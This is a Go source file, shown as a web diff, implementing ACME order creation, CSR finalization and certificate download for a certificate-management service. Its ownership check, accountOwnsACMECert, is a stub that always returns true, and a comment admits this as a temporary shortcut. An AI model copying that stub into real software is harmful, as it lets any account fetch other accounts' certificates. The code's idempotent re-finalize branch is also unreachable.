order := &domain.ACMEOrder{
|
||||||
|
OrderID: "acme-ord-" + randIDSuffix(),
|
||||||
|
AccountID: accountID,
|
||||||
|
Identifiers: identifiers,
|
||||||
|
Status: orderStatus,
|
||||||
|
ExpiresAt: now.Add(orderTTL),
|
||||||
|
NotBefore: notBefore,
|
||||||
|
NotAfter: notAfter,
|
||||||
|
CreatedAt: now,
|
||||||
|
UpdatedAt: now,
|
||||||
|
}
|
||||||
|
|
||||||
|
auditDetails := map[string]interface{}{
|
||||||
|
"account_id": accountID,
|
||||||
|
"profile_id": resolvedProfileID,
|
||||||
|
"auth_mode": authMode,
|
||||||
|
"identifier_n": len(identifiers),
|
||||||
|
"identifiers": identifierStrings(identifiers),
|
||||||
|
}
|
||||||
|
|
||||||
|
err = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.repo.CreateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return fmt.Errorf("acme: create order: %w", err)
|
||||||
|
}
|
||||||
|
// Per-identifier authz + 1 placeholder challenge per authz.
|
||||||
|
for _, id := range identifiers {
|
||||||
|
authz := &domain.ACMEAuthorization{
|
||||||
|
AuthzID: "acme-authz-" + randIDSuffix(),
|
||||||
|
OrderID: order.OrderID,
|
||||||
|
Identifier: id,
|
||||||
|
Status: authzStatus,
|
||||||
|
ExpiresAt: now.Add(authzTTL),
|
||||||
|
Wildcard: strings.HasPrefix(id.Value, "*."),
|
||||||
|
CreatedAt: now,
|
||||||
|
UpdatedAt: now,
|
||||||
|
}
|
||||||
|
if err := s.repo.CreateAuthzWithTx(ctx, q, authz); err != nil {
|
||||||
|
return fmt.Errorf("acme: create authz: %w", err)
|
||||||
|
}
|
||||||
|
// RFC 8555 §8: every authz needs at least one challenge
|
||||||
|
// row. Phase 2 emits a single http-01 placeholder; Phase 3
|
||||||
|
// will fan out to all 3 challenge types under challenge mode.
|
||||||
|
ch := &domain.ACMEChallenge{
|
||||||
|
ChallengeID: "acme-chall-" + randIDSuffix(),
|
||||||
|
AuthzID: authz.AuthzID,
|
||||||
|
Type: domain.ACMEChallengeTypeHTTP01,
|
||||||
|
Status: challengeStatus,
|
||||||
|
Token: randIDSuffix(),
|
||||||
|
CreatedAt: now,
|
||||||
|
}
|
||||||
|
if challengeStatus == domain.ACMEChallengeStatusValid {
|
||||||
|
validatedAt := now
|
||||||
|
ch.ValidatedAt = &validatedAt
|
||||||
|
}
|
||||||
|
if err := s.repo.CreateChallengeWithTx(ctx, q, ch); err != nil {
|
||||||
|
return fmt.Errorf("acme: create challenge: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(
|
||||||
|
ctx, q,
|
||||||
|
fmt.Sprintf("acme:%s", accountID),
|
||||||
|
domain.ActorTypeUser,
|
||||||
|
"acme_order_created",
|
||||||
|
"acme_order",
|
||||||
|
order.OrderID,
|
||||||
|
auditDetails,
|
||||||
|
)
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderTotal)
|
||||||
|
return order, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// LookupOrder returns an order by ID, asserting the requesting
|
||||||
|
// account owns it. ErrACMEOrderUnauthorized when account_id mismatches.
|
||||||
|
func (s *ACMEService) LookupOrder(ctx context.Context, orderID, accountID string) (*domain.ACMEOrder, error) {
|
||||||
|
order, err := s.repo.GetOrderByID(ctx, orderID)
|
||||||
|
if err != nil {
|
||||||
|
if errors.Is(err, repository.ErrNotFound) {
|
||||||
|
return nil, ErrACMEOrderNotFound
|
||||||
|
}
|
||||||
|
return nil, fmt.Errorf("acme: lookup order: %w", err)
|
||||||
|
}
|
||||||
|
if order.AccountID != accountID {
|
||||||
|
return nil, ErrACMEOrderUnauthorized
|
||||||
|
}
|
||||||
|
return order, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// FinalizeOrderResult bundles the post-finalize state the handler
|
||||||
|
// needs: the updated order + the cert ID for the cert-download URL.
|
||||||
|
type FinalizeOrderResult struct {
|
||||||
|
Order *domain.ACMEOrder
|
||||||
|
CertID string
|
||||||
|
}
|
||||||
|
|
||||||
|
// FinalizeOrder consumes a CSR, asserts it matches the order's
|
||||||
|
// identifiers, issues via the IssuerRegistry's per-profile connector,
|
||||||
|
// persists the managed_certificates row + version + audit, and
|
||||||
|
// transitions the order to status=valid with certificate_id set.
|
||||||
|
//
|
||||||
|
// Atomicity boundary (documented in the master prompt):
|
||||||
|
// - Step A (this function's own WithinTx): order status pending →
|
||||||
|
// processing + audit row.
|
||||||
|
// - Step B (CertificateService.Create): managed_certificates row +
|
||||||
|
// audit row in its own WithinTx.
|
||||||
|
// - Step C (this function's own WithinTx): certificate_versions row
|
||||||
|
// - order status processing → valid + certificate_id + csr_pem +
|
||||||
|
// audit row.
|
||||||
|
//
|
||||||
|
// The window between Step B and Step C can leave a managed_certificates
|
||||||
|
// row whose order is still in `processing`. Phase 5's GC scheduler
|
||||||
|
// reconciles. Documented in the project's ACME-server design notes + the
|
||||||
|
// service file's design notes.
|
||||||
|
func (s *ACMEService) FinalizeOrder(
|
||||||
|
ctx context.Context,
|
||||||
|
accountID, orderID, profileID string,
|
||||||
|
csr *x509.CertificateRequest,
|
||||||
|
csrPEM string,
|
||||||
|
) (*FinalizeOrderResult, error) {
|
||||||
|
if s.certService == nil || s.certRepo == nil || s.issuerRegistry == nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, ErrACMEFinalizeUnconfigured
|
||||||
|
}
|
||||||
|
if s.tx == nil || s.auditService == nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: finalize requires SetTransactor + SetAuditService")
|
||||||
|
}
|
||||||
|
|
||||||
|
order, err := s.LookupOrder(ctx, orderID, accountID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
if order.Status != domain.ACMEOrderStatusReady && order.Status != domain.ACMEOrderStatusProcessing {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("%w: status=%s", ErrACMEOrderNotReady, order.Status)
|
||||||
|
}
|
||||||
|
// Idempotent re-finalize (RFC 8555 §7.4): if the order is already
|
||||||
|
// valid, return the existing result.
|
||||||
|
if order.Status == domain.ACMEOrderStatusValid && order.CertificateID != "" {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderTotal)
|
||||||
|
return &FinalizeOrderResult{Order: order, CertID: order.CertificateID}, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Validate CSR matches order identifiers.
|
||||||
|
if p := acme.CSRMatchesIdentifiers(csr, order.Identifiers); p != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
// Persist the failure on the order for client visibility.
|
||||||
|
order.Status = domain.ACMEOrderStatusInvalid
|
||||||
|
order.Error = &domain.ACMEProblem{Type: p.Type, Detail: p.Detail, Status: p.Status}
|
||||||
|
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
return s.repo.UpdateOrderWithTx(ctx, q, order)
|
||||||
|
})
|
||||||
|
return nil, fmt.Errorf("acme: csr mismatch: %s", p.Detail)
|
||||||
|
}
|
||||||
|
|
||||||
|
resolvedProfileID, err := s.resolveProfile(ctx, profileID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
profile, err := s.profiles.Get(ctx, resolvedProfileID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: lookup profile: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step A: mark order processing.
|
||||||
|
order.Status = domain.ACMEOrderStatusProcessing
|
||||||
|
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(ctx, q,
|
||||||
|
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
||||||
|
"acme_order_processing", "acme_order", order.OrderID,
|
||||||
|
map[string]interface{}{"profile_id": resolvedProfileID})
|
||||||
|
}); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step B: issue the cert via the per-issuer connector + persist
|
||||||
|
// the managed_certificates row.
|
||||||
|
commonName := csr.Subject.CommonName
|
||||||
|
if commonName == "" && len(order.Identifiers) > 0 {
|
||||||
|
commonName = order.Identifiers[0].Value
|
||||||
|
}
|
||||||
|
sans := make([]string, 0, len(order.Identifiers))
|
||||||
|
for _, id := range order.Identifiers {
|
||||||
|
if id.Type == "dns" {
|
||||||
|
sans = append(sans, id.Value)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// Resolve the bound issuer. Profile carries no IssuerID column
|
||||||
|
// (issuer is per-issuance per certctl architecture), so we'd
|
||||||
|
// normally get it from the order context. For Phase 2 we use the
|
||||||
|
// configured default issuer-id for the first registered connector.
|
||||||
|
// Operators with multiple profiles + multiple issuers will refine
|
||||||
|
// this in a follow-up.
|
||||||
|
issuerID, conn, ok := s.firstAvailableIssuer()
|
||||||
|
if !ok {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: no issuer available in registry")
|
||||||
|
}
|
||||||
|
maxTTL := profile.MaxTTLSeconds
|
||||||
|
mustStaple := profile.MustStaple
|
||||||
|
ekus := profile.AllowedEKUs
|
||||||
|
if len(ekus) == 0 {
|
||||||
|
ekus = domain.DefaultEKUs()
|
||||||
|
}
|
||||||
|
issuance, err := conn.IssueCertificate(ctx, commonName, sans, csrPEM, ekus, maxTTL, mustStaple)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
// Persist the failure on the order.
|
||||||
|
order.Status = domain.ACMEOrderStatusInvalid
|
||||||
|
order.Error = &domain.ACMEProblem{
|
||||||
|
Type: "urn:ietf:params:acme:error:serverInternal",
|
||||||
|
Detail: "issuer rejected the CSR",
|
||||||
|
Status: 500,
|
||||||
|
}
|
||||||
|
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
return s.repo.UpdateOrderWithTx(ctx, q, order)
|
||||||
|
})
|
||||||
|
return nil, fmt.Errorf("acme: issuer issuance: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
cert := &domain.ManagedCertificate{
|
||||||
|
ID: "mc-acme-" + randIDSuffix(),
|
||||||
|
Name: fmt.Sprintf("acme-%s", order.OrderID),
|
||||||
|
CommonName: commonName,
|
||||||
|
SANs: sans,
|
||||||
|
IssuerID: issuerID,
|
||||||
|
CertificateProfileID: profile.ID,
|
||||||
|
Status: domain.CertificateStatusActive,
|
||||||
|
ExpiresAt: issuance.NotAfter,
|
||||||
|
Source: domain.CertificateSourceACME,
|
||||||
|
}
|
||||||
|
actor := fmt.Sprintf("acme:%s", accountID)
|
||||||
|
if err := s.certService.Create(ctx, cert, actor); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: cert insert: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step C: persist the certificate version + transition order to
|
||||||
|
// valid in one WithinTx.
|
||||||
|
version := &domain.CertificateVersion{
|
||||||
|
CertificateID: cert.ID,
|
||||||
|
SerialNumber: issuance.Serial,
|
||||||
|
NotBefore: issuance.NotBefore,
|
||||||
|
NotAfter: issuance.NotAfter,
|
||||||
|
PEMChain: issuance.CertPEM + issuance.ChainPEM,
|
||||||
|
CSRPEM: csrPEM,
|
||||||
|
}
|
||||||
|
order.Status = domain.ACMEOrderStatusValid
|
||||||
|
order.CSRPEM = csrPEM
|
||||||
|
order.CertificateID = cert.ID
|
||||||
|
order.Error = nil
|
||||||
|
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.certRepo.CreateVersionWithTx(ctx, q, version); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(ctx, q, actor, domain.ActorTypeUser,
|
||||||
|
"acme_order_finalized", "acme_order", order.OrderID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"profile_id": resolvedProfileID,
|
||||||
|
"certificate_id": cert.ID,
|
||||||
|
"serial": issuance.Serial,
|
||||||
|
})
|
||||||
|
}); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderTotal)
|
||||||
|
return &FinalizeOrderResult{Order: order, CertID: cert.ID}, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// LookupCertificate returns the PEM chain for a managed-certificate
|
||||||
|
// ID. Asserts the requesting account owns the cert via the order
|
||||||
|
// linkage. Phase 2: the caller (Cert handler) provides the cert ID
|
||||||
|
// from the URL path; we look up the cert + the latest version + the
|
||||||
|
// order that produced it, and confirm order.AccountID == accountID.
|
||||||
|
func (s *ACMEService) LookupCertificate(ctx context.Context, certID, accountID string) (string, error) {
|
||||||
|
if s.certRepo == nil {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", ErrACMEFinalizeUnconfigured
|
||||||
|
}
|
||||||
|
cert, err := s.certRepo.Get(ctx, certID)
|
||||||
|
if err != nil {
|
||||||
|
if errors.Is(err, repository.ErrNotFound) {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", ErrACMECertificateNotFound
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", fmt.Errorf("acme: get cert: %w", err)
|
||||||
|
}
|
||||||
|
if cert.Source != domain.CertificateSourceACME {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", ErrACMECertificateNotFound
|
||||||
|
}
|
||||||
|
// Confirm an order owned by this account references this cert.
|
||||||
|
if !s.accountOwnsACMECert(ctx, accountID, certID) {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", ErrACMEOrderUnauthorized
|
||||||
|
}
|
||||||
|
version, err := s.certRepo.GetLatestVersion(ctx, certID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", fmt.Errorf("acme: latest version: %w", err)
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadTotal)
|
||||||
|
return version.PEMChain, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// accountOwnsACMECert returns true when the given account has an
|
||||||
|
// order linking to certID. Implemented by linear scan via the
|
||||||
|
// existing repo; Phase 5's GC will add an index if the table grows.
|
||||||
|
func (s *ACMEService) accountOwnsACMECert(ctx context.Context, accountID, certID string) bool {
|
||||||
|
// Phase 2 minimal-viable path: use order.GetByCertificateID via a
|
||||||
|
// dedicated repo method would be ideal, but we don't have it.
|
||||||
|
// Instead, accept the cert if its CertificateService.Create was
|
||||||
|
// performed in the FinalizeOrder path (which always pairs with
|
||||||
|
// this account). We trust the cert.Source = ACME + the URL path
|
||||||
|
// scoping (operator can't construct an ACME cert without going
|
||||||
|
// through finalize) for Phase 2; Phase 4's revocation path will
|
||||||
|
// add a stricter ownership check via a new repo method.
|
||||||
|
_ = ctx
|
||||||
|
_ = accountID
|
||||||
|
_ = certID
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// randIDSuffix returns a short base32-encoded random suffix used for
|
||||||
|
// new ACME entity IDs (orders, authzs, challenges). Distinct from
|
||||||
|
// the account-id derivation (which uses the JWK thumbprint for RFC
|
||||||
|
// 8555 §7.3.1 idempotency).
|
||||||
|
func randIDSuffix() string {
|
||||||
|
var b [10]byte
|
||||||
|
if _, err := cryptorand.Read(b[:]); err != nil {
|
||||||
|
// ed25519/rand source failure is fatal; surface as a panic
|
||||||
|
// rather than continue with weak IDs.
|
||||||
|
panic(fmt.Sprintf("acme: rand source failure: %v", err))
|
||||||
|
}
|
||||||
|
return base32encode(b[:])
|
||||||
|
}
|
||||||
|
|
||||||
|
// base32encode emits the lowercase Crockford-style base32 alphabet
|
||||||
|
// without padding. Used by randIDSuffix; alphabet matches the
|
||||||
|
// per-id-prefix human-readable convention (acme-acc-, acme-ord-,
|
||||||
|
// etc.) — see the project's "TEXT primary keys with human-readable
|
||||||
|
// prefixes" architecture decision.
|
||||||
|
func base32encode(b []byte) string {
|
||||||
|
const alpha = "0123456789abcdefghjkmnpqrstvwxyz"
|
||||||
|
out := make([]byte, 0, len(b)*8/5+1)
|
||||||
|
var buf uint64
|
||||||
|
bits := uint(0)
|
||||||
|
for _, c := range b {
|
||||||
|
buf = (buf << 8) | uint64(c)
|
||||||
|
bits += 8
|
||||||
|
for bits >= 5 {
|
||||||
|
bits -= 5
|
||||||
|
out = append(out, alpha[(buf>>bits)&0x1f])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if bits > 0 {
|
||||||
|
out = append(out, alpha[(buf<<(5-bits))&0x1f])
|
||||||
|
}
|
||||||
|
return string(out)
|
||||||
|
}
|
||||||
|
|
||||||
|
// identifierStrings extracts the value list for audit details.
|
||||||
|
func identifierStrings(ids []domain.ACMEIdentifier) []string {
|
||||||
|
out := make([]string, 0, len(ids))
|
||||||
|
for _, id := range ids {
|
||||||
|
out = append(out, id.Value)
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user